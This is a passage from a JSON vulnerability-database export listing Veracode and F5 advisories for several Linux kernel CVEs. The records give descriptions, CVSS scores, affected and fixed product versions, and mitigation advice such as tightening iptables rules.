"description": "Linux kernel that is built with `CONFIG_POSIX_TIMERES` and `CONFIG_CHECKPOINT_RESTORE` is vulnerable to information disclosure. An out-of-bounds access in the `show_timer` function in the `timer_create syscall` implementation in `kernel/time/posix-timers.c` allows userspace applications to read arbitrary kernel memory containing confidential information. This is due to an improper validation of the `sigevent->sigev_notify` field when `/proc/$PID/timers` is read.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-15T09:26:26", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2020-10-15T15:09:39", "id": "VERACODE:13144", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-13144/summary", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T13:13:23", "description": "kernel is vulnerable to denial of service (DoS) attacks. The vulnerability exists as the (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.\n", "cvss3": {}, "published": "2019-01-15T09:09:53", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2023-02-02T21:36:23", "id": "VERACODE:11917", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-11917/summary", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-04-18T14:02:31", "description": "Linux kernel is vulnerable to privilege escalation attacks. This allows local users to gain privileges by triggering access to a paging structure by a different CPU. which leads to perform unauthorized actions.\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-02T05:51:58", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2022-04-19T18:15:32", "id": "VERACODE:17713", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-17713/summary", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:24:33", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system. * A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important) Red Hat would like to thank the Perception Point research team for reporting this issue. All kernel-rt users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-02T05:20:50", "type": "veracode", "title": "Integer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2023-02-13T01:48:41", "id": "VERACODE:16632", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-16632/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T13:27:17", "description": "Red Hat Enterprise MRG (Messaging, Realtime, and Grid) is vulnerable to denial of service. An attacker can use a malicious device with a large amount of (1) EHCI or (2) XHCI data associated with an event to cause out-of-bounds write via the `magicmouse_raw_event` function in `drivers/hid/hid-magicmouse.c`.\n", "cvss3": {}, "published": "2019-01-15T09:02:01", "type": "veracode", "title": "Denial Of Service", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2019-05-15T06:18:07", "id": "VERACODE:11436", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-11436/summary", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T13:26:42", "description": "kernel-rt is vulnerable to arbitrary code execution. The vulnerability exists through the `UDP_CORK` option in a setsockopt systemcall.\n", "cvss3": {}, "published": "2019-05-02T04:56:30", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2023-02-13T07:17:58", "id": "VERACODE:14987", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-14987/summary", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2020-04-06T22:40:48", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2015-08-13T20:55:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2014-8134", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2019-09-07T02:46:00", "id": "F5:K17120", "href": "https://support.f5.com/csp/article/K17120", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-08T18:44:24", "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2015-08-13T00:00:00", "type": "f5", "title": "SOL17120 - Linux kernel vulnerability CVE-2014-8134", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2015-08-13T00:00:00", "id": "SOL17120", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/100/sol17120.html", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2023-05-31T16:57:42", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel before 4.14.3 allow local users to cause a denial of service (BUG) by leveraging a race condition with __dm_destroy during creation and removal of DM devices. ([CVE-2017-18203](<https://vulners.com/cve/CVE-2017-18203>))\n\nImpact\n\nTraffix SDC\n\nThis vulnerability may allow a denial-of-service (DoS) attack on the affected system.\n\nBIG-IP, BIG-IQ, F5 iWorkflow, Enterprise Manager, and ARX \n\nThere is no impact; these F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-17T15:06:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2017-18203", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2018-07-17T15:06:00", "id": "F5:K41101201", "href": "https://support.f5.com/csp/article/K41101201", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-08T15:43:33", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn&#x27;t properly validate the sigevent-&gt;sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE). ([CVE-2017-18344](<https://vulners.com/cve/CVE-2017-18344>))\n\nImpact\n\nA local attacker may use this vulnerability to expose sensitive information or cause a denial of service (DoS), making the system unresponsive.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T02:20:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2017-18344", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2022-10-28T03:49:00", "id": "F5:K07020416", "href": "https://support.f5.com/csp/article/K07020416", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-08T22:21:05", "description": "\nF5 Product Development has assigned ID 540174 (BIG-IP), ID 520651 (FirePass), ID 540056 (BIG-IQ and F5 iWorkflow), ID 540059 (Enterprise Manager), and ID 461496 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H544199 on the **Diagnostics** &gt; **Identified** &gt; **High** screen. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP AAM | 12.0.0 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP AFM | 12.0.0 \n11.6.0 - 11.6.1 \n11.3.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP APM | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP ASM | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP DNS | 12.0.0 | 12.1.0 \n12.0.0 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | 11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 \n11.6.0 - 11.6.1 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP PEM | 12.0.0 \n11.6.0 - 11.6.1 \n11.3.0 - 11.5.4 | 12.1.0 \n12.0.0 HF1 \n11.6.2 \n11.6.1 HF1 \n11.5.5 | High | Linux kernel \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | High | Linux kernel \nARX | 6.0.0 - 6.4.0 | None | Medium | Linux kernel \nEnterprise Manager | 3.0.0 - 3.1.1 | None | High | Linux kernel \nFirePass | 7.0.0 \n6.1.0 | 6.0.0 | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 4.6.0 - 5.1.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.1.0 - 2.3.0 | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None | Medium | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nBIG-IP, BIG-IQ, and Enterprise Manager\n\nTo mitigate this vulnerability for the BIG-IP system, F5 recommends that you expose management access only on trusted networks.\n\nTraffix SDC\n\nTo mitigate this vulnerability for the Traffix SDC system, you can perform the following tasks:\n\n * When possible, remove **iptables **entries allowing traffic for the following UDP services: \n * **Syslog**: \n\n-A INPUT -i eth0 -p udp -m udp --dport 514 -m comment --comment \"SYSLOG\" -j ACCEPT\n\n * **SIP**: \n\n-A INPUT -p udp -m udp --dport 5060 -m comment --comment \"SIP protocol\" -j ACCEPT\n\n * **Diameter**: \n\n-A INPUT -d 192.168.1.71/32 -i eth0 -p udp -m udp --dport 3868 -j ACCEPT\n\n * Add source validation on **iptables **entries allowing traffic for the following UDP service: \n * **SNMP**: \n\n-A INPUT -i eth0 -p udp -m udp --dport 161 -m comment --comment \"statistics by SNMP\" -j ACCEPT \n-A INPUT -d 192.168.1.74/32 -i eth0 -p udp -m udp --dport 162 -m comment --comment \"SNMP TRAPS\" -j ACCEPT\n\n * Use anti-spoofing rules on the upstream firewalls.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "cvss3": {}, "published": "2015-09-25T02:05:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2015-5364", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2017-10-28T00:13:00", "id": "F5:K17307", "href": "https://support.f5.com/csp/article/K17307", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:04", "description": " \n\n\nThe (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood. ([CVE-2015-5364](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5364>)) \n\n", "cvss3": {}, "published": "2015-09-24T00:00:00", "type": "f5", "title": "SOL17307 - Linux kernel vulnerability CVE-2015-5364", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2015-12-02T00:00:00", "id": "SOL17307", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/300/sol17307.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-10T20:23:06", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-10T19:21:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-2069", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 